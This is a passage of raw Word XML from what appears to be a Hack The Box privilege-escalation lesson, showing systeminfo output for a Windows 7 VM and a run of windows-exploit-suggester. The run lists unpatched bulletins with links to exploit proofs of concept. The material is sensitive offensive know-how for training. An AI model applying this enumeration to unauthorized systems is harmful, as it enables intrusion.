    <w:p w14:paraId="02BCB12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Product ID:                00371-222-9819843-86644</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE3EFEB"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Original Install Date:     3/25/2021, 7:23:47 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277D54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System Boot Time:          5/13/2021, 5:14:12 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3ECE08"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System Manufacturer:       VMware, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7672C15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System Model:              VMware Virtual Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F84B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System Type:               x64-based PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70441C9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Processor(s):              2 Processor(s) Installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A26E7"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 xml:space="preserve">                           [01]: AMD64 Family 23 Model 49 Stepping 0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AuthenticAMD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~2994 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mhz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20830F36"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 xml:space="preserve">                           [02]: AMD64 Family 23 Model 49 Stepping 0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AuthenticAMD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~2994 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mhz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EEB534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BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7796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Windows Directory:         C:\Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A3D3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527C238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lastRenderedPageBreak/>
        <w:t>&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CC29E"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Updating the Local Microsoft Vulnerability Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7324E8"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We then need to update our local copy of the Microsoft Vulnerability database. This command will save the contents to a local Excel file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B955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Updating the Local Microsoft Vulnerability Database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D5299"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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> python2.7 windows-exploit-suggester.py --update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D67459"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Running Windows Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A6016"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Once this is done, we can run the tool against the vulnerability database to check for potential privilege escalation flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484F918"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Running Windows Exploit Suggester </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54E40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DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>yovecio@htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>]$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> python2.7 windows-exploit-suggester.py  --database 2021-05-13-mssb.xls --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> win7lpe-systeminfo.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD10B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3367E4B"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initiating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>winsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> version 3.3...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C97BFD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database file detected as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or xlsx based on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>extension</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44A8591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attempting to read from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> input </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="096F26C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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> input file read successfully (utf-8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830064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querying database file for potential vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C8A2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comparing the 3 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>hotfix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(es) against the 386 potential bulletins(s) with a database of 137 known exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE0B1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there are now 386 remaining </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>vulns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FFD096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[E] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> PoC, [M] Metasploit module, [*] missing bulletin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FE67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windows version identified as 'Windows 7 SP1 64-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bit'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F19B99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28F21646"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MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D4049"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https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A82DF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https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF79FA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https://github.com/tinysec/public/tree/master/CVE-2016-7255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5152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09FA1FB7"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MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F6414"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https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF40B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05F3549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MS16-075: Security Update for Windows SMB Server (3164038) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301456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https://github.com/foxglovesec/RottenPotato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D14A4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https://github.com/Kevin-Robertson/Tater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A696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https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B047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https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF8085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08652F8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MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDDF94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https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2114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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NamedEscape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x250C Pool Corruption (MS16-074), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4ED3B8"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771D39B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MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D30A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https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F34A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4814C6C9"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[E] MS16-059: Security Update for Windows Media </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3150220) - Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AE31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https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>- .MCL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> File Processing Remote Code Execution (MS16-059), PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02879E1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27C78D14"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MS16-056: Security Update for Windows Journal (3156761) - Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7BF3C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https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Script</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Walker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Memory Corruption (MS15-056)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074352D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http://blog.skylined.nl/20161206001.html -- MSIE jscript9 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Script</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:softHyphen/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
